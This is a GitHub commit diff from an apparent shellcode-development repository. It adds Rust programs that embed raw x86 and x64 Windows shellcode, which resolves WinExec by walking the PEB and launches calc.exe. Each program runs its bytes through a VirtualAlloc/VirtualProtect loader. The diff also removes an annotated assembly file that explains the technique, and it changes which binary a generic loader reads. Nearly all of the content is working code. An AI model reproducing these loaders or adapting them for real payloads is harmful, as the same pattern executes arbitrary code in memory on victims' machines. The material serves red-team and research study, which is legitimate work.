Skip to content

Commit 4256584

Browse files
Whitecat18Whitecat18
committed
Custom Shellcode Updates
Updated x64 and x86 shellcodes for testing purpose
1 parent fa9687b commit 4256584

File tree

6 files changed

+181
-110
lines changed

6 files changed

+181
-110
lines changed

Custom_Shellcode/calc_shellcode1.rs

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -15,6 +15,7 @@ fn main() -> std::io::Result<()> {
1515
0x81, 0x3c, 0x07, 0x57, 0x69, 0x6e, 0x45, 0x75, 0xef, 0x8b, 0x74, 0x1f, 0x1c, 0x48, 0x01,
1616
0xfe, 0x8b, 0x34, 0xae, 0x48, 0x01, 0xf7, 0x99, 0xff, 0xd7,
1717
];
18+
1819

1920
unsafe {
2021
let mem = VirtualAlloc(null_mut(), shellcode.len(), 0x1000 | 0x2000, 0x04);

Custom_Shellcode/calc_shellcode3.rs

Lines changed: 42 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,42 @@
1+
/*
2+
Windows x32 Calc.exe Shellcode
3+
*/
4+
5+
use std::ptr::null_mut;
6+
7+
use winapi::um::memoryapi::{VirtualAlloc, VirtualProtect};
8+
9+
fn main() -> std::io::Result<()> {
10+
11+
// windows x32 bit
12+
let shellcode: [u8; 53] = [
13+
0xeb, 0x1b, 0x5b, 0x31, 0xc0, 0x50, 0x31, 0xc0, 0x88, 0x43, 0x13, 0x53, 0xbb, 0xad, 0x23, 0x86,
14+
0x7c, 0xff, 0xd3, 0x31, 0xc0, 0x50, 0xbb, 0xfa, 0xca, 0x81, 0x7c, 0xff, 0xd3, 0xe8, 0xe0, 0xff,
15+
0xff, 0xff, 0x63, 0x6d, 0x64, 0x2e, 0x65, 0x78, 0x65, 0x20, 0x2f, 0x63, 0x20, 0x63, 0x61, 0x6c,
16+
0x63, 0x2e, 0x65, 0x78, 0x65,
17+
];
18+
19+
20+
unsafe {
21+
let mem = VirtualAlloc(null_mut(), shellcode.len(), 0x1000 | 0x2000, 0x04);
22+
23+
if mem.is_null() {
24+
return Err(std::io::Error::last_os_error());
25+
}
26+
27+
std::ptr::copy_nonoverlapping(shellcode.as_ptr(), mem as *mut u8, shellcode.len());
28+
29+
let mut old_protect = 0;
30+
let result = VirtualProtect(mem, shellcode.len(), 0x40, &mut old_protect);
31+
32+
if result == 0 {
33+
return Err(std::io::Error::last_os_error());
34+
}
35+
36+
let func: extern "C" fn() = std::mem::transmute(mem);
37+
func();
38+
}
39+
40+
Ok(())
41+
}
42+

Custom_Shellcode/calc_shellcode4.rs

Lines changed: 134 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,134 @@
1+
2+
/*
3+
Windows x64 Calc.exe Shellcode
4+
*/
5+
6+
use std::ptr::null_mut;
7+
8+
use winapi::um::memoryapi::{VirtualAlloc, VirtualProtect};
9+
10+
fn main() -> std::io::Result<()> {
11+
12+
let shellcode: [u8; 1342] = [
13+
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
14+
0x66, 0x9C, 0x50, 0x51, 0x52, 0x53, 0x55, 0x56, 0x57, 0x41, 0x50, 0x41, 0x51, 0x41,
15+
0x52, 0x41, 0x53, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0xE8, 0x1F, 0x00,
16+
0x00, 0x00, 0x41, 0x5F, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x41, 0x5B, 0x41, 0x5A,
17+
0x41, 0x59, 0x41, 0x58, 0x5F, 0x5E, 0x5D, 0x5B, 0x5A, 0x59, 0x58, 0x66, 0x9D, 0xFF,
18+
0x25, 0xBB, 0xFF, 0xFF, 0xFF, 0x56, 0x48, 0x8B, 0xF4, 0x48, 0x83, 0xE4, 0xF0, 0x48,
19+
0x83, 0xEC, 0x20, 0xE8, 0x05, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xE6, 0x5E, 0xC3, 0x48,
20+
0x83, 0xEC, 0x38, 0xE8, 0x20, 0x00, 0x00, 0x00, 0x6B, 0x00, 0x65, 0x00, 0x72, 0x00,
21+
0x6E, 0x00, 0x65, 0x00, 0x6C, 0x00, 0x33, 0x00, 0x32, 0x00, 0x2E, 0x00, 0x64, 0x00,
22+
0x6C, 0x00, 0x6C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x59, 0xE8,
23+
0x8F, 0x02, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0x48, 0x83, 0x7C, 0x24, 0x20,
24+
0x00, 0x75, 0x07, 0xB8, 0x01, 0x00, 0x00, 0x00, 0xEB, 0x46, 0xE8, 0x08, 0x00, 0x00,
25+
0x00, 0x57, 0x69, 0x6E, 0x45, 0x78, 0x65, 0x63, 0x00, 0x5A, 0x48, 0x8B, 0x4C, 0x24,
26+
0x20, 0xE8, 0x33, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x28, 0x48, 0x83, 0x7C,
27+
0x24, 0x28, 0x00, 0x75, 0x07, 0xB8, 0x04, 0x00, 0x00, 0x00, 0xEB, 0x1A, 0xBA, 0x01,
28+
0x00, 0x00, 0x00, 0xE8, 0x09, 0x00, 0x00, 0x00, 0x63, 0x61, 0x6C, 0x63, 0x2E, 0x65,
29+
0x78, 0x65, 0x00, 0x59, 0xFF, 0x54, 0x24, 0x28, 0x33, 0xC0, 0x48, 0x83, 0xC4, 0x38,
30+
0xC3, 0x48, 0x89, 0x54, 0x24, 0x10, 0x48, 0x89, 0x4C, 0x24, 0x08, 0x48, 0x83, 0xEC,
31+
0x78, 0x48, 0x8B, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x30,
32+
0x48, 0x8B, 0x44, 0x24, 0x30, 0x0F, 0xB7, 0x00, 0x3D, 0x4D, 0x5A, 0x00, 0x00, 0x74,
33+
0x07, 0x33, 0xC0, 0xE9, 0xFA, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24, 0x30, 0x48,
34+
0x63, 0x40, 0x3C, 0x48, 0x8B, 0x8C, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x03, 0xC8,
35+
0x48, 0x8B, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x40, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x48,
36+
0x6B, 0xC0, 0x00, 0x48, 0x8B, 0x4C, 0x24, 0x40, 0x48, 0x8D, 0x84, 0x01, 0x88, 0x00,
37+
0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x38, 0x48, 0x8B, 0x44, 0x24, 0x38, 0x83, 0x38,
38+
0x00, 0x75, 0x07, 0x33, 0xC0, 0xE9, 0xB2, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24,
39+
0x38, 0x8B, 0x00, 0x89, 0x44, 0x24, 0x18, 0x8B, 0x44, 0x24, 0x18, 0x48, 0x03, 0x84,
40+
0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x10, 0x48, 0x8B, 0x44, 0x24,
41+
0x10, 0x8B, 0x40, 0x18, 0x48, 0x89, 0x44, 0x24, 0x48, 0x48, 0x8B, 0x44, 0x24, 0x10,
42+
0x8B, 0x40, 0x1C, 0x89, 0x44, 0x24, 0x24, 0x48, 0x8B, 0x44, 0x24, 0x10, 0x8B, 0x40,
43+
0x20, 0x89, 0x44, 0x24, 0x1C, 0x48, 0x8B, 0x44, 0x24, 0x10, 0x8B, 0x40, 0x24, 0x89,
44+
0x44, 0x24, 0x20, 0x48, 0xC7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x0D,
45+
0x48, 0x8B, 0x44, 0x24, 0x08, 0x48, 0xFF, 0xC0, 0x48, 0x89, 0x44, 0x24, 0x08, 0x48,
46+
0x8B, 0x44, 0x24, 0x48, 0x48, 0x39, 0x44, 0x24, 0x08, 0x0F, 0x83, 0x3B, 0x01, 0x00,
47+
0x00, 0x8B, 0x44, 0x24, 0x1C, 0x48, 0x8B, 0x8C, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48,
48+
0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x8B, 0x4C, 0x24, 0x08, 0x48, 0x8D, 0x04, 0x88,
49+
0x48, 0x89, 0x44, 0x24, 0x58, 0x8B, 0x44, 0x24, 0x20, 0x48, 0x8B, 0x8C, 0x24, 0x80,
50+
0x00, 0x00, 0x00, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x8B, 0x4C, 0x24, 0x08,
51+
0x48, 0x8D, 0x04, 0x48, 0x48, 0x89, 0x44, 0x24, 0x50, 0x8B, 0x44, 0x24, 0x24, 0x48,
52+
0x8B, 0x8C, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48,
53+
0x8B, 0x4C, 0x24, 0x50, 0x0F, 0xB7, 0x09, 0x48, 0x8D, 0x04, 0x88, 0x48, 0x89, 0x44,
54+
0x24, 0x60, 0x48, 0x8B, 0x44, 0x24, 0x58, 0x8B, 0x00, 0x48, 0x8B, 0x8C, 0x24, 0x80,
55+
0x00, 0x00, 0x00, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x28,
56+
0x48, 0xC7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x0B, 0x48, 0x8B, 0x04, 0x24,
57+
0x48, 0xFF, 0xC0, 0x48, 0x89, 0x04, 0x24, 0x48, 0x8B, 0x04, 0x24, 0x48, 0x8B, 0x8C,
58+
0x24, 0x88, 0x00, 0x00, 0x00, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x0F, 0xBE, 0x00,
59+
0x85, 0xC0, 0x74, 0x45, 0x48, 0x8B, 0x04, 0x24, 0x48, 0x8B, 0x4C, 0x24, 0x28, 0x48,
60+
0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x0F, 0xBE, 0x00, 0x85, 0xC0, 0x74, 0x2F, 0x48, 0x8B,
61+
0x04, 0x24, 0x48, 0x8B, 0x8C, 0x24, 0x88, 0x00, 0x00, 0x00, 0x48, 0x03, 0xC8, 0x48,
62+
0x8B, 0xC1, 0x0F, 0xBE, 0x00, 0x48, 0x8B, 0x0C, 0x24, 0x48, 0x8B, 0x54, 0x24, 0x28,
63+
0x48, 0x03, 0xD1, 0x48, 0x8B, 0xCA, 0x0F, 0xBE, 0x09, 0x3B, 0xC1, 0x74, 0x02, 0xEB,
64+
0x02, 0xEB, 0x97, 0x48, 0x8B, 0x04, 0x24, 0x48, 0x8B, 0x8C, 0x24, 0x88, 0x00, 0x00,
65+
0x00, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x0F, 0xBE, 0x00, 0x85, 0xC0, 0x75, 0x2D,
66+
0x48, 0x8B, 0x04, 0x24, 0x48, 0x8B, 0x4C, 0x24, 0x28, 0x48, 0x03, 0xC8, 0x48, 0x8B,
67+
0xC1, 0x0F, 0xBE, 0x00, 0x85, 0xC0, 0x75, 0x17, 0x48, 0x8B, 0x44, 0x24, 0x60, 0x8B,
68+
0x00, 0x48, 0x8B, 0x8C, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x03, 0xC8, 0x48, 0x8B,
69+
0xC1, 0xEB, 0x07, 0xE9, 0xA8, 0xFE, 0xFF, 0xFF, 0x33, 0xC0, 0x48, 0x83, 0xC4, 0x78,
70+
0xC3, 0x48, 0x89, 0x4C, 0x24, 0x08, 0x48, 0x83, 0xEC, 0x58, 0x65, 0x48, 0x8B, 0x04,
71+
0x25, 0x60, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x40, 0x48, 0x8B, 0x44, 0x24,
72+
0x40, 0x48, 0x8B, 0x40, 0x18, 0x48, 0x89, 0x44, 0x24, 0x48, 0x48, 0x8B, 0x44, 0x24,
73+
0x48, 0x48, 0x83, 0xC0, 0x20, 0x48, 0x89, 0x44, 0x24, 0x38, 0x48, 0x8B, 0x44, 0x24,
74+
0x38, 0x48, 0x8B, 0x00, 0x48, 0x89, 0x44, 0x24, 0x30, 0xEB, 0x0D, 0x48, 0x8B, 0x44,
75+
0x24, 0x30, 0x48, 0x8B, 0x00, 0x48, 0x89, 0x44, 0x24, 0x30, 0x48, 0x8B, 0x44, 0x24,
76+
0x38, 0x48, 0x39, 0x44, 0x24, 0x30, 0x0F, 0x84, 0xBF, 0x01, 0x00, 0x00, 0x48, 0x8B,
77+
0x44, 0x24, 0x30, 0x48, 0x83, 0xE8, 0x10, 0x48, 0x89, 0x44, 0x24, 0x28, 0x48, 0x83,
78+
0x7C, 0x24, 0x28, 0x00, 0x74, 0x0C, 0x48, 0x8B, 0x44, 0x24, 0x28, 0x48, 0x83, 0x78,
79+
0x30, 0x00, 0x75, 0x05, 0xE9, 0x98, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24, 0x28,
80+
0x48, 0x8B, 0x40, 0x60, 0x48, 0x89, 0x44, 0x24, 0x10, 0x48, 0x83, 0x7C, 0x24, 0x10,
81+
0x00, 0x75, 0x02, 0xEB, 0xA4, 0x48, 0xC7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0xEB,
82+
0x0B, 0x48, 0x8B, 0x04, 0x24, 0x48, 0xFF, 0xC0, 0x48, 0x89, 0x04, 0x24, 0x48, 0x8B,
83+
0x44, 0x24, 0x28, 0x0F, 0xB7, 0x40, 0x58, 0x48, 0x39, 0x04, 0x24, 0x0F, 0x83, 0x26,
84+
0x01, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24, 0x60, 0x48, 0x8B, 0x0C, 0x24, 0x0F, 0xB7,
85+
0x04, 0x48, 0x85, 0xC0, 0x74, 0x11, 0x48, 0x8B, 0x44, 0x24, 0x10, 0x48, 0x8B, 0x0C,
86+
0x24, 0x0F, 0xB7, 0x04, 0x48, 0x85, 0xC0, 0x75, 0x05, 0xE9, 0xFF, 0x00, 0x00, 0x00,
87+
0x48, 0x8B, 0x44, 0x24, 0x60, 0x48, 0x8B, 0x0C, 0x24, 0x0F, 0xB7, 0x04, 0x48, 0x83,
88+
0xF8, 0x5A, 0x7F, 0x47, 0x48, 0x8B, 0x44, 0x24, 0x60, 0x48, 0x8B, 0x0C, 0x24, 0x0F,
89+
0xB7, 0x04, 0x48, 0x83, 0xF8, 0x41, 0x7C, 0x35, 0x48, 0x8B, 0x44, 0x24, 0x60, 0x48,
90+
0x8B, 0x0C, 0x24, 0x0F, 0xB7, 0x04, 0x48, 0x83, 0xE8, 0x41, 0x83, 0xC0, 0x61, 0x89,
91+
0x44, 0x24, 0x20, 0x48, 0x8B, 0x44, 0x24, 0x60, 0x48, 0x8B, 0x0C, 0x24, 0x0F, 0xB7,
92+
0x54, 0x24, 0x20, 0x66, 0x89, 0x14, 0x48, 0x0F, 0xB7, 0x44, 0x24, 0x20, 0x66, 0x89,
93+
0x44, 0x24, 0x08, 0xEB, 0x12, 0x48, 0x8B, 0x44, 0x24, 0x60, 0x48, 0x8B, 0x0C, 0x24,
94+
0x0F, 0xB7, 0x04, 0x48, 0x66, 0x89, 0x44, 0x24, 0x08, 0x0F, 0xB7, 0x44, 0x24, 0x08,
95+
0x66, 0x89, 0x44, 0x24, 0x18, 0x48, 0x8B, 0x44, 0x24, 0x10, 0x48, 0x8B, 0x0C, 0x24,
96+
0x0F, 0xB7, 0x04, 0x48, 0x83, 0xF8, 0x5A, 0x7F, 0x47, 0x48, 0x8B, 0x44, 0x24, 0x10,
97+
0x48, 0x8B, 0x0C, 0x24, 0x0F, 0xB7, 0x04, 0x48, 0x83, 0xF8, 0x41, 0x7C, 0x35, 0x48,
98+
0x8B, 0x44, 0x24, 0x10, 0x48, 0x8B, 0x0C, 0x24, 0x0F, 0xB7, 0x04, 0x48, 0x83, 0xE8,
99+
0x41, 0x83, 0xC0, 0x61, 0x89, 0x44, 0x24, 0x24, 0x48, 0x8B, 0x44, 0x24, 0x10, 0x48,
100+
0x8B, 0x0C, 0x24, 0x0F, 0xB7, 0x54, 0x24, 0x24, 0x66, 0x89, 0x14, 0x48, 0x0F, 0xB7,
101+
0x44, 0x24, 0x24, 0x66, 0x89, 0x44, 0x24, 0x0A, 0xEB, 0x12, 0x48, 0x8B, 0x44, 0x24,
102+
0x10, 0x48, 0x8B, 0x0C, 0x24, 0x0F, 0xB7, 0x04, 0x48, 0x66, 0x89, 0x44, 0x24, 0x0A,
103+
0x0F, 0xB7, 0x44, 0x24, 0x0A, 0x66, 0x89, 0x44, 0x24, 0x1C, 0x0F, 0xB7, 0x44, 0x24,
104+
0x18, 0x0F, 0xB7, 0x4C, 0x24, 0x1C, 0x3B, 0xC1, 0x74, 0x02, 0xEB, 0x05, 0xE9, 0xBC,
105+
0xFE, 0xFF, 0xFF, 0x48, 0x8B, 0x44, 0x24, 0x60, 0x48, 0x8B, 0x0C, 0x24, 0x0F, 0xB7,
106+
0x04, 0x48, 0x85, 0xC0, 0x75, 0x1C, 0x48, 0x8B, 0x44, 0x24, 0x10, 0x48, 0x8B, 0x0C,
107+
0x24, 0x0F, 0xB7, 0x04, 0x48, 0x85, 0xC0, 0x75, 0x0B, 0x48, 0x8B, 0x44, 0x24, 0x28,
108+
0x48, 0x8B, 0x40, 0x30, 0xEB, 0x07, 0xE9, 0x24, 0xFE, 0xFF, 0xFF, 0x33, 0xC0, 0x48,
109+
0x83, 0xC4, 0x58, 0xC3,
110+
];
111+
112+
unsafe {
113+
let mem = VirtualAlloc(null_mut(), shellcode.len(), 0x1000 | 0x2000, 0x04);
114+
115+
if mem.is_null() {
116+
return Err(std::io::Error::last_os_error());
117+
}
118+
119+
std::ptr::copy_nonoverlapping(shellcode.as_ptr(), mem as *mut u8, shellcode.len());
120+
121+
let mut old_protect = 0;
122+
let result = VirtualProtect(mem, shellcode.len(), 0x40, &mut old_protect);
123+
124+
if result == 0 {
125+
return Err(std::io::Error::last_os_error());
126+
}
127+
128+
let func: extern "C" fn() = std::mem::transmute(mem);
129+
func();
130+
}
131+
132+
Ok(())
133+
}
134+

Custom_Shellcode/shellcode_extract/calc_x64.asm

Lines changed: 0 additions & 108 deletions
Original file line numberDiff line numberDiff line change
@@ -1,108 +0,0 @@
1-
; Shellcode practice.
2-
; The goal is to locate and call WinExec from kernel32.dll without external dependencies dynamically....
3-
; Just a snippet by @5mukx...
4-
5-
[bits 64]
6-
7-
section .text
8-
global _start
9-
10-
_start:
11-
; Access PEB to locate kernel32.dll
12-
xor rbx, rbx ; set the rbx register to zero eg.. 5 ^ 5 = 0
13-
mov rbx, [gs: 0x60] ; rbx = PEB address (from gs segment, 0x60 offset)
14-
mov rbx, [rbx+0x18] ; rbx = PEB->Ldr (PEB_LDR_DATA)
15-
16-
; rbx = InMemoryOrderModuleList
17-
; The head of a doubly-linked list that contains the loaded modules for the process.
18-
; Each item in the list is a pointer to an LDR_DATA_TABLE_ENTRY structure
19-
add rbx, 0x20
20-
21-
; now i'm trying to traverse the InMemoryOrderModuleList to find kernel32.dll
22-
mov rbx, [rbx] ; rbx = 1st entery(ntdll.dll)
23-
mov rbx, [rbx] ; RBX = 2nd entry (kernelbase.dll)
24-
mov rbx, [rbx] ; RBX = 3rd entry (kernel32.dll)
25-
26-
mov rbx, [rbx+0x20] ; RBX = DllBase (base addr of kernel32.dll )
27-
mov r8, rbx
28-
29-
; trying to locate export table of kernel32.dll
30-
mov ebx, [r8+0x3c] ; EBX = e_lfanew (this is an offset to PE headers)
31-
add rbx, r8 ; RBX = PE header addr
32-
xor rcx, rcx ; 0
33-
add cl, 0x88 ; RCX = 0x88 (offset to export table RVA)
34-
mov ebx, [rbx+rcx] ; EBX = export table RVA
35-
add rbx, r8 ; RBX = export table address
36-
mov r9, rbx ; R9 = export table address ...
37-
38-
; get the addrs of export table arrays
39-
xor r10, r10 ; 0
40-
mov r10d, [r9+0x1c] ; R10 = AddressOfFunctions
41-
add r10, r8 ; R10 = AddressOfFunctions address
42-
xor r11, r11
43-
mov r11d, [r9+0x20] ; R11 = AddressOfNames RVA
44-
add r11, r8 ; R11 = AddressOfNames address
45-
xor r12, r12
46-
mov r12d, [r9+0x24] ; R12 = AddressOfNameOrdinals RVA
47-
add r12, r8 ; R12 = AddressOfNameOrdinals address
48-
49-
; finding WinExec function !
50-
xor rcx, rcx
51-
add cl, 7 ; RCX = 7 (length of "WinExec")
52-
xor rax, rax
53-
push rax ; Push null terminator
54-
mov rax, 0x00636578456E6957 ; RAX = "cexEniW\0" (WinExec, reversed)
55-
push rax ; Push function name to stack
56-
mov rbx, rsp ; RBX = pointer to "WinExec" string
57-
58-
call get_winapi_func ; Call function to resolve WinExec address
59-
mov r13, rax ; R13 = WinExec function address
60-
61-
; arguments for WinExec("calc.exe", SW_SHOWNORMAL)
62-
xor rcx, rcx
63-
xor rdx, rdx
64-
push rcx ; Push null terminator
65-
mov rcx, 0x6578652e636c6163 ; RCX = "exe.clac" (calc.exe, reversed) LIFO ...!
66-
push rcx ; Push command string to stack
67-
mov rcx, rsp ; RCX = pointer to "calc.exe" string
68-
mov rdx, 0x1 ; RDX = 1 (SW_SHOWNORMAL)
69-
70-
; align stack and call WinExec
71-
and rsp, -16 ; Align stack to 16 bytes
72-
sub rsp, 32 ; Allocate shadow space (Windows x64 convention)
73-
call r13 ; Call WinExec("calc.exe", 1)
74-
75-
get_winapi_func:
76-
; finding the function address from export table ...!
77-
; Input:
78-
;R8 = kernel32.dll base
79-
;R10 = AddressOfFunctions
80-
;R11 = AddressOfNames
81-
;R12 = AddressOfNameOrdinals
82-
;RBX = function name
83-
;RCX = name length
84-
; Output:
85-
;RAX = function address
86-
87-
xor rax, rax ; RAX = counter (index)
88-
push rcx ; Save name length
89-
90-
; looking through the functions in address of names
91-
loop:
92-
xor rdi, rdi ; 0
93-
mov rcx, [rsp] ; RCX = name length
94-
mov rsi, rbx ; RSI = function name ("WinExec")
95-
mov edi, [r11+rax*4] ; RDI = RVA of current function name
96-
add rdi, r8 ; RDI = address of function name
97-
repe cmpsb ; compare the function name with "WinExec"
98-
je resolve_func_addr ; If it's match, resolve address
99-
inc rax ; increment the counter
100-
jmp short loop ; continue the loop
101-
102-
resolve_func_addr:
103-
pop rcx ; Restore stack
104-
mov ax, [r12+rax*2] ; AX = ordinal from AddressOfNameOrdinals
105-
mov eax, [r10+rax*4] ; EAX = function RVA from AddressOfFunctions
106-
add rax, r8 ; RAX = function address (RVA + kernel32.dll base)
107-
ret ; return the function address ...
108-

Custom_Shellcode/shellcode_extract/reverse.asm

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -5,7 +5,8 @@
55
; By @5mukx
66

77

8-
[BITS 32]
8+
BITS 32
9+
910
section .text
1011
global _start
1112

Custom_Shellcode/shellcode_extract/src/main.rs

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -7,7 +7,7 @@ use std::ptr;
77
fn main() -> std::io::Result<()> {
88
println!("[+] Small Program to execute shellcode from bin and execute and display <>");
99

10-
let mut file = File::open("reverse.bin")?;
10+
let mut file = File::open("shell.bin")?;
1111
let mut shellcode = Vec::new();
1212
file.read_to_end(&mut shellcode)?;
1313

@@ -53,3 +53,4 @@ fn main() -> std::io::Result<()> {
5353

5454
Ok(())
5555
}
56+

0 commit comments

Comments
 (0)